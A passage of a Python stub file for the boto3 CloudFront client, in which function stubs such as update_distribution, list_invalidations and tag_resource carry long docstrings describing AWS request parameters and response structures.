'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False }, ] } } :returns: (string) -- """ pass def list_distributions_by_web_acl_id(Marker=None, MaxItems=None, WebACLId=None): """ List the distributions that are associated with a specified AWS WAF web ACL. See also: AWS API Documentation :example: response = client.list_distributions_by_web_acl_id( Marker='string', MaxItems='string', WebACLId='string' ) :type Marker: string :param Marker: Use Marker and MaxItems to control pagination of results. If you have more than MaxItems distributions that satisfy the request, the response includes a NextMarker element. To get the next page of results, submit another request. For the value of Marker , specify the value of NextMarker from the last response. (For the first request, omit Marker .) :type MaxItems: string :param MaxItems: The maximum number of distributions that you want CloudFront to return in the response body. The maximum and default values are both 100. :type WebACLId: string :param WebACLId: [REQUIRED] The ID of the AWS WAF web ACL that you want to list the associated distributions. If you specify 'null' for the ID, the request returns a list of the distributions that aren't associated with a web ACL. :rtype: dict :return: { 'DistributionList': { 'Marker': 'string', 'NextMarker': 'string', 'MaxItems': 123, 'IsTruncated': True|False, 'Quantity': 123, 'Items': [ { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False }, ] } } :returns: (string) -- """ pass def list_invalidations(DistributionId=None, Marker=None, MaxItems=None): """ Lists invalidation batches. See also: AWS API Documentation :example: response = client.list_invalidations( DistributionId='string', Marker='string', MaxItems='string' ) :type DistributionId: string :param DistributionId: [REQUIRED] The distribution's ID. :type Marker: string :param Marker: Use this parameter when paginating results to indicate where to begin in your list of invalidation batches. Because the results are returned in decreasing order from most recent to oldest, the most recent results are on the first page, the second page will contain earlier results, and so on. To get the next page of results, set Marker to the value of the NextMarker from the current page's response. This value is the same as the ID of the last invalidation batch on that page. :type MaxItems: string :param MaxItems: The maximum number of invalidation batches that you want in the response body. :rtype: dict :return: { 'InvalidationList': { 'Marker': 'string', 'NextMarker': 'string', 'MaxItems': 123, 'IsTruncated': True|False, 'Quantity': 123, 'Items': [ { 'Id': 'string', 'CreateTime': datetime(2015, 1, 1), 'Status': 'string' }, ] } } """ pass def list_streaming_distributions(Marker=None, MaxItems=None): """ List streaming distributions. See also: AWS API Documentation :example: response = client.list_streaming_distributions( Marker='string', MaxItems='string' ) :type Marker: string :param Marker: The value that you provided for the Marker request parameter. :type MaxItems: string :param MaxItems: The value that you provided for the MaxItems request parameter. :rtype: dict :return: { 'StreamingDistributionList': { 'Marker': 'string', 'NextMarker': 'string', 'MaxItems': 123, 'IsTruncated': True|False, 'Quantity': 123, 'Items': [ { 'Id': 'string', 'ARN': 'string', 'Status': 'string', 'LastModifiedTime': datetime(2015, 1, 1), 'DomainName': 'string', 'S3Origin': { 'DomainName': 'string', 'OriginAccessIdentity': 'string' }, 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'Comment': 'string', 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False }, ] } } :returns: (string) -- """ pass def list_tags_for_resource(Resource=None): """ List tags for a CloudFront resource. See also: AWS API Documentation :example: response = client.list_tags_for_resource( Resource='string' ) :type Resource: string :param Resource: [REQUIRED] An ARN of a CloudFront resource. :rtype: dict :return: { 'Tags': { 'Items': [ { 'Key': 'string', 'Value': 'string' }, ] } } """ pass def tag_resource(Resource=None, Tags=None): """ Add tags to a CloudFront resource. See also: AWS API Documentation :example: response = client.tag_resource( Resource='string', Tags={ 'Items': [ { 'Key': 'string', 'Value': 'string' }, ] } ) :type Resource: string :param Resource: [REQUIRED] An ARN of a CloudFront resource. :type Tags: dict :param Tags: [REQUIRED] A complex type that contains zero or more Tag elements. Items (list) --A complex type that contains Tag elements. (dict) --A complex type that contains Tag key and Tag value. Key (string) -- [REQUIRED]A string that contains Tag key. The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . Value (string) --A string that contains an optional Tag value. The string length should be between 0 and 256 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . """ pass def untag_resource(Resource=None, TagKeys=None): """ Remove tags from a CloudFront resource. See also: AWS API Documentation :example: response = client.untag_resource( Resource='string', TagKeys={ 'Items': [ 'string', ] } ) :type Resource: string :param Resource: [REQUIRED] An ARN of a CloudFront resource. :type TagKeys: dict :param TagKeys: [REQUIRED] A complex type that contains zero or more Tag key elements. Items (list) --A complex type that contains Tag key elements. (string) --A string that contains Tag key. The string length should be between 1 and 128 characters. Valid characters include a-z , A-Z , 0-9 , space, and the special characters _ - . : / = + @ . """ pass def update_cloud_front_origin_access_identity(CloudFrontOriginAccessIdentityConfig=None, Id=None, IfMatch=None): """ Update an origin access identity. See also: AWS API Documentation :example: response = client.update_cloud_front_origin_access_identity( CloudFrontOriginAccessIdentityConfig={ 'CallerReference': 'string', 'Comment': 'string' }, Id='string', IfMatch='string' ) :type CloudFrontOriginAccessIdentityConfig: dict :param CloudFrontOriginAccessIdentityConfig: [REQUIRED] The identity's configuration information. CallerReference (string) -- [REQUIRED]A unique number that ensures the request can't be replayed. If the CallerReference is new (no matter the content of the CloudFrontOriginAccessIdentityConfig object), a new origin access identity is created. If the CallerReference is a value already sent in a previous identity request, and the content of the CloudFrontOriginAccessIdentityConfig is identical to the original request (ignoring white space), the response includes the same information returned to the original request. If the CallerReference is a value you already sent in a previous request to create an identity, but the content of the CloudFrontOriginAccessIdentityConfig is different from the original request, CloudFront returns a CloudFrontOriginAccessIdentityAlreadyExists error. Comment (string) -- [REQUIRED]Any comments you want to include about the origin access identity. :type Id: string :param Id: [REQUIRED] The identity's id. :type IfMatch: string :param IfMatch: The value of the ETag header that you received when retrieving the identity's configuration. For example: E2QWRUHAPOMQZL . :rtype: dict :return: { 'CloudFrontOriginAccessIdentity': { 'Id': 'string', 'S3CanonicalUserId': 'string', 'CloudFrontOriginAccessIdentityConfig': { 'CallerReference': 'string', 'Comment': 'string' } }, 'ETag': 'string' } """ pass def update_distribution(DistributionConfig=None, Id=None, IfMatch=None): """ Update a distribution. See also: AWS API Documentation :example: response = client.update_distribution( DistributionConfig={ 'CallerReference': 'string', 'Aliases': { 'Quantity': 123, 'Items': [ 'string', ] }, 'DefaultRootObject': 'string', 'Origins': { 'Quantity': 123, 'Items': [ { 'Id': 'string', 'DomainName': 'string', 'OriginPath': 'string', 'CustomHeaders': { 'Quantity': 123, 'Items': [ { 'HeaderName': 'string', 'HeaderValue': 'string' }, ] }, 'S3OriginConfig': { 'OriginAccessIdentity': 'string' }, 'CustomOriginConfig': { 'HTTPPort': 123, 'HTTPSPort': 123, 'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only', 'OriginSslProtocols': { 'Quantity': 123, 'Items': [ 'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2', ] }, 'OriginReadTimeout': 123, 'OriginKeepaliveTimeout': 123 } }, ] }, 'DefaultCacheBehavior': { 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, 'CacheBehaviors': { 'Quantity': 123, 'Items': [ { 'PathPattern': 'string', 'TargetOriginId': 'string', 'ForwardedValues': { 'QueryString': True|False, 'Cookies': { 'Forward': 'none'|'whitelist'|'all', 'WhitelistedNames': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'Headers': { 'Quantity': 123, 'Items': [ 'string', ] }, 'QueryStringCacheKeys': { 'Quantity': 123, 'Items': [ 'string', ] } }, 'TrustedSigners': { 'Enabled': True|False, 'Quantity': 123, 'Items': [ 'string', ] }, 'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https', 'MinTTL': 123, 'AllowedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ], 'CachedMethods': { 'Quantity': 123, 'Items': [ 'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE', ] } }, 'SmoothStreaming': True|False, 'DefaultTTL': 123, 'MaxTTL': 123, 'Compress': True|False, 'LambdaFunctionAssociations': { 'Quantity': 123, 'Items': [ { 'LambdaFunctionARN': 'string', 'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response' }, ] } }, ] }, 'CustomErrorResponses': { 'Quantity': 123, 'Items': [ { 'ErrorCode': 123, 'ResponsePagePath': 'string', 'ResponseCode': 'string', 'ErrorCachingMinTTL': 123 }, ] }, 'Comment': 'string', 'Logging': { 'Enabled': True|False, 'IncludeCookies': True|False, 'Bucket': 'string', 'Prefix': 'string' }, 'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All', 'Enabled': True|False, 'ViewerCertificate': { 'CloudFrontDefaultCertificate': True|False, 'IAMCertificateId': 'string', 'ACMCertificateArn': 'string', 'SSLSupportMethod': 'sni-only'|'vip', 'MinimumProtocolVersion': 'SSLv3'|'TLSv1', 'Certificate': 'string', 'CertificateSource': 'cloudfront'|'iam'|'acm' }, 'Restrictions': { 'GeoRestriction': { 'RestrictionType': 'blacklist'|'whitelist'|'none', 'Quantity': 123, 'Items': [ 'string', ] } }, 'WebACLId': 'string', 'HttpVersion': 'http1.1'|'http2', 'IsIPV6Enabled': True|False }, Id='string', IfMatch='string' ) :type DistributionConfig: dict :param DistributionConfig: [REQUIRED] The distribution's configuration information. CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed. If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution. If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request. If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error. Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution. Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution. Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution. (string) -- DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution. Specify only the object name, for example, index.html . Do not add a / before the object name. If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element. To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element. To replace the default root object, update the distribution configuration and specify the new object. For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide . Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution. Quantity (integer) -- [REQUIRED]The number of origins for this distribution. Items (list) --A complex type that contains origins for this distribution. (dict) --A complex type that describes the Amazon S3 bucket or the HTTP server (for example, a web server) from which CloudFront gets your files. You must create at least one origin. For the current limit on the number of origins that you can create for a distribution, see Amazon CloudFront Limits in the AWS General Reference . Id (string) -- [REQUIRED]A unique identifier for the origin. The value of Id must be unique within the distribution. When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide . DomainName (string) -- [REQUIRED] Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com . Constraints for Amazon S3 origins: If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName . The bucket name must be between 3 and 63 characters long (inclusive). The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes. The bucket name must not contain adjacent periods. Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com . Constraints for custom origins: DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters. The name cannot exceed 128 characters. OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name. For example, suppose you've specified the following values for your distribution: DomainName : An Amazon S3 bucket named myawsbucket . OriginPath : /production CNAME : example.com When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html . When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html . CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want. Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution. Items (list) -- Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items . (dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution. HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide . HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field. S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead. OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is: origin-access-identity/CloudFront/ID-of-origin-access-identity where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity. If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element. To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element. To replace the origin access identity, update the distribution configuration and specify the new origin access identity. For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide . CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead. HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on. HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on. OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin. OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS. Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin. Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution. (string) -- OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds. If you need to increase the maximum time limit, contact the AWS Support Center . DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior. TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior. ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies. QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any: If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin. If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify. If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters. For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide . Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide . Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type. Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element. WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies. If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically. For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference . Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior. Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior. (string) -- Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior. Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following: Forward all headers to your origin : Specify 1 for Quantity and * for Name . Warning If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin. Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify. Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers. Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items . (string) -- QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior. Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior. Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items . (string) -- TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content. If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide . If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items . To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution. Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId . Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior. Items (list) -- Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items . (string) -- ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options: allow-all : Viewers can use HTTP or HTTPS. redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL. https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden). For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide . Note The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide . MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide . You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ). AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices: CloudFront forwards only GET and HEAD requests. CloudFront forwards only GET , HEAD , and OPTIONS requests. CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests. If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin. Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your 